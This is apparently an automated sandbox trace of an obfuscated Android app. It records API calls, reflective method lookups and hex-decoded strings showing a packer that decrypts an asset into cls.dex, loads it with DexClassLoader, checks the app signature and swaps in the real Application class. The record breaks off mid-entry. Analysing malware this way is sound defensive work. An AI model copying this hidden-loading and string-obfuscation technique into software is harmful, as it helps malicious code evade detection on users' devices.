API: mpio.fabric.sdk.android.services.network.HttpRequest$HttpRequestException->getCause at ..:1 Show source
API: java.io.BufferedOutputStream-><init> at ..:1 Show source
API: java.nio.charset.Charset->forName at ..:6 Show source
API: java.nio.charset.Charset->newEncoder at ..:9 Show source
API: java.nio.CharBuffer->wrap at ..:3 Show source
API: java.nio.charset.CharsetEncoder->encode at ..:6 Show source
API: java.nio.ByteBuffer->array at ..:9 Show source
API: java.nio.ByteBuffer->limit at ..:13 Show source
API: java.io.BufferedOutputStream->write at ..:16 Show source
API: java.lang.Object-><init> at ..:1 Show source
API: java.lang.IllegalStateException-><init> at ..:10 Show source
API: java.lang.StringBuilder-><init> at ..:24 Show source
API: android.content.Context->getPackageName at ..:28 Show source
API: java.lang.StringBuilder->append at ..:31 Show source
API: java.lang.StringBuilder->toString at ..:34 Show source
API: android.content.Context->getCacheDir at ..:3 Show source
API: android.os.Environment->getExternalStorageState at ..:1 Show source
API: java.lang.String->equals at ..:6 Show source
API: android.content.Context->getExternalFilesDir at ..:14 Show source
API: android.os.Environment->getExternalStorageDirectory at ..:22 Show source
API: java.lang.StringBuilder-><init> at ..:26 Show source
API: java.lang.StringBuilder->append at ..:30 Show source
API: java.lang.StringBuilder->append at ..:35 Show source
API: java.lang.StringBuilder->append at ..:40 Show source
API: java.lang.StringBuilder->toString at ..:43 Show source
API: java.io.File-><init> at ..:46 Show source
API: java.io.File->exists at ..:2 Show source
API: java.io.File->mkdirs at ..:6 Show source
API: android.content.Context->getFilesDir at ..:3 Show source
API: android.content.Context->getExternalCacheDir at ..:11 Show source
API: android.os.Environment->getExternalStorageDirectory at ..:19 Show source
API: java.lang.StringBuilder-><init> at ..:23 Show source
API: java.lang.StringBuilder->append at ..:27 Show source
API: java.lang.StringBuilder->append at ..:32 Show source
API: java.lang.StringBuilder->append at ..:37 Show source
API: java.lang.StringBuilder->toString at ..:40 Show source
API: java.io.File-><init> at ..:43 Show source
API: java.lang.Object-><init> at ..:1 Show source
Method: etxtfvw.cqwwrwk.onCreate:143 Show source
NameTypeValue
clazzjava.lang.Object
  • toString: class com.czybg.eqtbdmzpklrgyns.MainApp
contextandroid.app.ContextImpl
  • toString: android.app.ContextImpl@2d30d73d
NameTypeValue
Return Valuecom.czybg.eqtbdmzpklrgyns.MainApp
  • toString: com.czybg.eqtbdmzpklrgyns.MainApp@850754a
Method: etxtfvw.cqwwrwk.YRkFJMV:294 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@11bbda4a
NameTypeValue
Return Valuejava.lang.Integer
  • toString: 581760
Method: com.czybg.eqtbdmzpklrgyns.MultiLoader.service:19 Show source
NameTypeValue
p0android.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
NameTypeValue
Return Valueandroid.content.ComponentName
  • toString: ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ}
Method: pvsaeqhpgq.zvsin.attachBaseContext:54 Show source
NameTypeValue
p0java.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
p1java.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
p2null
  • toString: null
p3dalvik.system.PathClassLoader
  • toString: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.czybg.eqtbdmzpklrgyns-1/base.apk"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
NameTypeValue
Return Valuedalvik.system.DexClassLoader
  • toString: dalvik.system.DexClassLoader[DexPathList[[zip file "/data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
Method: etxtfvw.cqwwrwk.YRkFJMV:62 Show source
NameTypeValue
Return Valueandroid.content.res.AssetManager
  • toString: android.content.res.AssetManager@b801830
Method: etxtfvw.cqwwrwk.YRkFJMV:180 Show source
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
Method: etxtfvw.cqwwrwk.YRkFJMV:1018 Show source
NameTypeValue
p0android.app.LoadedApk
  • toString: android.app.LoadedApk@28fea956
p1dalvik.system.DexClassLoader
  • toString: dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
Method: com.czybg.eqtbdmzpklrgyns.WDAcpd.LmcGi:199 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:177 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:217 Show source
Method: com.czybg.eqtbdmzpklrgyns.NvHUu.DiXsQ:146 Show source
Method: pvsaeqhpgq.zvsin.attachBaseContext:88 Show source
NameTypeValue
p0java.lang.String
  • toString: attachBaseContext
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@3b89dafc
  • Arrays.toString: [class android.content.Context]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void etxtfvw.cqwwrwk.attachBaseContext(android.content.Context)
  • getName: attachBaseContext
Method: etxtfvw.cqwwrwk.attachBaseContext:25 Show source
NameTypeValue
p0java.lang.String
  • toString: YRkFJMV
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@1f308d94
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: private void etxtfvw.cqwwrwk.YRkFJMV()
  • getName: YRkFJMV
Method: pvsaeqhpgq.zvsin.onCreate:13 Show source
NameTypeValue
p0java.lang.String
  • toString: onCreate
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@115404e2
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void etxtfvw.cqwwrwk.onCreate()
  • getName: onCreate
Method: etxtfvw.cqwwrwk.onCreate:57 Show source
NameTypeValue
p0java.lang.String
  • toString: newApplication
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@a501b78
  • Arrays.toString: [class java.lang.Class, class android.content.Context]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public static android.app.Application android.app.Instrumentation.newApplication(java.lang.Class,android.content.Context) throws java.lang.InstantiationException,java.lang.IllegalAccessException,java.lang.ClassNotFoundException
  • getName: newApplication
Method: ..:15 Show source
Method: ..:14 Show source
Method: com.czybg.eqtbdmzpklrgyns.fQuMyR.DiXsQ:10 Show source
Method: ..:10 Show source
Method: com.czybg.eqtbdmzpklrgyns.bsLhBT.DiXsQ:8 Show source
Method: com.czybg.eqtbdmzpklrgyns.WDAcpd.LmcGi:93 Show source
Method: com.czybg.eqtbdmzpklrgyns.WDAcpd.LmcGi:234 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:557 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:597 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:625 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:651 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:699 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:793 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:13 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:45 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:58 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:79 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:145 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:252 Show source
Method: etxtfvw.cqwwrwk.CNLldGq:297 Show source
Method: com.czybg.eqtbdmzpklrgyns.NvHUu.DiXsQ:131 Show source
Method: com.czybg.eqtbdmzpklrgyns.HLqFdR.hZyMGHgz:66 Show source
Method: ..:11 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:35 Show source
NameTypeValue
p0java.lang.String
  • toString: open
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@10ff9e18
  • Arrays.toString: [class java.lang.String]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
  • getName: open
Method: etxtfvw.cqwwrwk.YRkFJMV:52 Show source
NameTypeValue
p0java.lang.String
  • toString: getAssets
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@342202ad
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public android.content.res.AssetManager android.content.ContextWrapper.getAssets()
  • getName: getAssets
Method: etxtfvw.cqwwrwk.YRkFJMV:95 Show source
NameTypeValue
p0java.lang.String
  • toString: available
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@3526b7e1
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final int android.content.res.AssetManager$AssetInputStream.available() throws java.io.IOException
  • getName: available
Method: etxtfvw.cqwwrwk.YRkFJMV:170 Show source
NameTypeValue
p0java.lang.String
  • toString: getFilesDir
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@30ad25db
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.io.File android.content.ContextWrapper.getFilesDir()
  • getName: getFilesDir
Method: etxtfvw.cqwwrwk.YRkFJMV:244 Show source
NameTypeValue
p0java.lang.String
  • toString: createNewFile
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@2879bac1
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public boolean java.io.File.createNewFile() throws java.io.IOException
  • getName: createNewFile
Method: etxtfvw.cqwwrwk.YRkFJMV:282 Show source
NameTypeValue
p0java.lang.String
  • toString: read
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@18ae469f
  • Arrays.toString: [class [B]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final int android.content.res.AssetManager$AssetInputStream.read(byte[]) throws java.io.IOException
  • getName: read
Method: etxtfvw.cqwwrwk.YRkFJMV:310 Show source
NameTypeValue
p0java.lang.String
  • toString: close
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@135c6a97
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final void android.content.res.AssetManager$AssetInputStream.close() throws java.io.IOException
  • getName: close
Method: etxtfvw.cqwwrwk.YRkFJMV:348 Show source
NameTypeValue
p0java.lang.String
  • toString: CNLldGq
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@5c0f01c
  • Arrays.toString: [class [B]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public [B etxtfvw.cqwwrwk.CNLldGq(byte[])
  • getName: CNLldGq
Method: etxtfvw.cqwwrwk.YRkFJMV:739 Show source
NameTypeValue
p0java.lang.String
  • toString: write
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@b0547e6
  • Arrays.toString: [class [B]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void java.io.OutputStream.write(byte[]) throws java.io.IOException
  • getName: write
Method: etxtfvw.cqwwrwk.YRkFJMV:766 Show source
NameTypeValue
p0java.lang.String
  • toString: close
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@21593540
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void java.io.FileOutputStream.close() throws java.io.IOException
  • getName: close
Method: etxtfvw.cqwwrwk.YRkFJMV:828 Show source
NameTypeValue
p0java.lang.String
  • toString: getAbsolutePath
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@3c4808b3
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.lang.String java.io.File.getAbsolutePath()
  • getName: getAbsolutePath
Method: etxtfvw.cqwwrwk.YRkFJMV:855 Show source
NameTypeValue
p0java.lang.String
  • toString: getParentFile
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@21f867a5
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.io.File java.io.File.getParentFile()
  • getName: getParentFile
Method: etxtfvw.cqwwrwk.YRkFJMV:882 Show source
NameTypeValue
p0java.lang.String
  • toString: getParent
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@e4ae834
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.lang.String java.io.File.getParent()
  • getName: getParent
Method: etxtfvw.cqwwrwk.YRkFJMV:899 Show source
NameTypeValue
p0java.lang.String
  • toString: getParentFile
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@b868b59
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.io.File java.io.File.getParentFile()
  • getName: getParentFile
Method: etxtfvw.cqwwrwk.onCreate:19 Show source
NameTypeValue
p0java.lang.String
  • toString: onCreate
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@7541048
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void android.app.Application.onCreate()
  • getName: onCreate
Method: etxtfvw.cqwwrwk.onCreate:89 Show source
NameTypeValue
p0java.lang.String
  • toString: loadClass
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@198762af
  • Arrays.toString: [class java.lang.String]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) throws java.lang.ClassNotFoundException
  • getName: loadClass
Method: etxtfvw.cqwwrwk.onCreate:102 Show source
NameTypeValue
p0java.lang.String
  • toString: getClassLoader
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@2bbd52a8
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.lang.ClassLoader android.content.ContextWrapper.getClassLoader()
  • getName: getClassLoader
Method: etxtfvw.cqwwrwk.onCreate:134 Show source
NameTypeValue
p0java.lang.String
  • toString: getBaseContext
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@2fe5633e
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public android.content.Context android.content.ContextWrapper.getBaseContext()
  • getName: getBaseContext
Method: ..:4 Show source
Method: ..:25 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.DiXsQ:35 Show source
Method: ..:7 Show source
Method: ..:12 Show source
Method: ..:6 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.xnLvoQ:14 Show source
Method: com.czybg.eqtbdmzpklrgyns.jVOak.DiXsQ:5 Show source
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2930bfa6
  • $1: YRkFJMV
  • $2: 59526B464A4D56
NameTypeValue
Return Valuejava.lang.String
  • toString: YRkFJMV
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@3d94f183
  • $1: android.content.res.AssetManager
  • $2: 616E64726F69642E636F6E74656E742E7265732E41737365744D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: android.content.res.AssetManager
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@42b22df
  • $1: open
  • $2: 6F70656E
NameTypeValue
Return Valuejava.lang.String
  • toString: open
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@ba589f5
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@15908ed7
  • $1: getAssets
  • $2: 676574417373657473
NameTypeValue
Return Valuejava.lang.String
  • toString: getAssets
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@852e22e
  • $1: UMQrTOWqmLF
  • $2: 554D5172544F57716D4C46
NameTypeValue
Return Valuejava.lang.String
  • toString: UMQrTOWqmLF
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@132ef33a
  • $1: available
  • $2: 617661696C61626C65
NameTypeValue
Return Valuejava.lang.String
  • toString: available
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@b1caf92
  • $1: java.io.File
  • $2: 6A6176612E696F2E46696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.File
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@27d232de
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@26326d5
  • $1: getFilesDir
  • $2: 67657446696C6573446972
NameTypeValue
Return Valuejava.lang.String
  • toString: getFilesDir
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@34ce44b7
  • $1: java.io.File
  • $2: 6A6176612E696F2E46696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.File
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@4ac2142
  • $1: separator
  • $2: 736570617261746F72
NameTypeValue
Return Valuejava.lang.String
  • toString: separator
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2ddf0f8e
  • $1: cls.dex
  • $2: 636C732E646578
NameTypeValue
Return Valuejava.lang.String
  • toString: cls.dex
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1a7f3bcb
  • $1: createNewFile
  • $2: 6372656174654E657746696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: createNewFile
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@d935ef2
  • $1: read
  • $2: 72656164
NameTypeValue
Return Valuejava.lang.String
  • toString: read
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@58f9bc0
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@3b45d631
  • $1: close
  • $2: 636C6F7365
NameTypeValue
Return Valuejava.lang.String
  • toString: close
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@19f31933
  • $1: CNLldGq
  • $2: 434E4C6C644771
NameTypeValue
Return Valuejava.lang.String
  • toString: CNLldGq
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e001a69
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@266e7bab
  • $1: getPackageManager
  • $2: 6765745061636B6167654D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageManager
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@85126b4
  • $1: getPackageInfo
  • $2: 6765745061636B616765496E666F
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageInfo
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@34553e52
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2633fa20
  • $1: getPackageManager
  • $2: 6765745061636B6167654D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageManager
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@5ae984c
  • $1: getPackageName
  • $2: 6765745061636B6167654E616D65
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageName
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@ee64111
  • $1: android.content.pm.PackageManager
  • $2: 616E64726F69642E636F6E74656E742E706D2E5061636B6167654D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: android.content.pm.PackageManager
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2330077
  • $1: GET_SIGNATURES
  • $2: 4745545F5349474E415455524553
NameTypeValue
Return Valuejava.lang.String
  • toString: GET_SIGNATURES
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1c6e0f14
  • $1: signatures
  • $2: 7369676E617475726573
NameTypeValue
Return Valuejava.lang.String
  • toString: signatures
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@24ba4db2
  • $1: toByteArray
  • $2: 746F427974654172726179
NameTypeValue
Return Valuejava.lang.String
  • toString: toByteArray
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@6b42cac
  • $1: BROqnOXwFKWnWc
  • $2: 42524F716E4F5877464B576E5763
NameTypeValue
Return Valuejava.lang.String
  • toString: BROqnOXwFKWnWc
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1379e10a
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1e8d6798
  • $1: MD5
  • $2: 4D4435
NameTypeValue
Return Valuejava.lang.String
  • toString: MD5
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@cd91b0
  • $1: oDOixVSpHMour
  • $2: 6F444F6978565370484D6F7572
NameTypeValue
Return Valuejava.lang.String
  • toString: oDOixVSpHMour
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2330b7ae
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@297218dc
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@29d4a0ba
  • $1: android.util.Base64
  • $2: 616E64726F69642E7574696C2E426173653634
NameTypeValue
Return Valuejava.lang.String
  • toString: android.util.Base64
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e75e6c8
  • $1: decode
  • $2: 6465636F6465
NameTypeValue
Return Valuejava.lang.String
  • toString: decode
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@99c0e86
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2266a774
  • $1: android.util.Base64
  • $2: 616E64726F69642E7574696C2E426173653634
NameTypeValue
Return Valuejava.lang.String
  • toString: android.util.Base64
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@101a8d12
  • $1: DEFAULT
  • $2: 44454641554C54
NameTypeValue
Return Valuejava.lang.String
  • toString: DEFAULT
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@19fd443f
  • $1: getBytes
  • $2: 6765744279746573
NameTypeValue
Return Valuejava.lang.String
  • toString: getBytes
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2ebcd5a4
  • $1: java.io.FileOutputStream
  • $2: 6A6176612E696F2E46696C654F757470757453747265616D
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.FileOutputStream
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@18c3a810
  • $1: java.io.File
  • $2: 6A6176612E696F2E46696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.File
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1d9e22c5
  • $1: write
  • $2: 7772697465
NameTypeValue
Return Valuejava.lang.String
  • toString: write
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@254cdb4b
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@33cdfc72
  • $1: close
  • $2: 636C6F7365
NameTypeValue
Return Valuejava.lang.String
  • toString: close
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e3c656c
  • $1: parent
  • $2: 706172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: parent
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@5fca7ca
  • $1: parent
  • $2: 706172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: parent
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@7406c58
  • $1: parent
  • $2: 706172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: parent
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@11d527ed
  • $1: getAbsolutePath
  • $2: 6765744162736F6C75746550617468
NameTypeValue
Return Valuejava.lang.String
  • toString: getAbsolutePath
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@31b07d0f
  • $1: getParentFile
  • $2: 676574506172656E7446696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: getParentFile
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@28c6b146
  • $1: getParent
  • $2: 676574506172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: getParent
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@25e484a3
  • $1: getParentFile
  • $2: 676574506172656E7446696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: getParentFile
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@13e8f6b8
  • $1: dalvik.system.DexClassLoader
  • $2: 64616C76696B2E73797374656D2E446578436C6173734C6F61646572
NameTypeValue
Return Valuejava.lang.String
  • toString: dalvik.system.DexClassLoader
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1392c664
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@264fdc93
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@173e0fce
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@21169c85
  • $1: java.lang.ClassLoader
  • $2: 6A6176612E6C616E672E436C6173734C6F61646572
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.ClassLoader
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@24b18d2e
  • $1: android.app.Application
  • $2: 616E64726F69642E6170702E4170706C69636174696F6E
NameTypeValue
Return Valuejava.lang.String
  • toString: android.app.Application
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2e4d4e3a
  • $1: onCreate
  • $2: 6F6E437265617465
NameTypeValue
Return Valuejava.lang.String
  • toString: onCreate
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@4908ac7
  • $1: android.app.Instrumentation
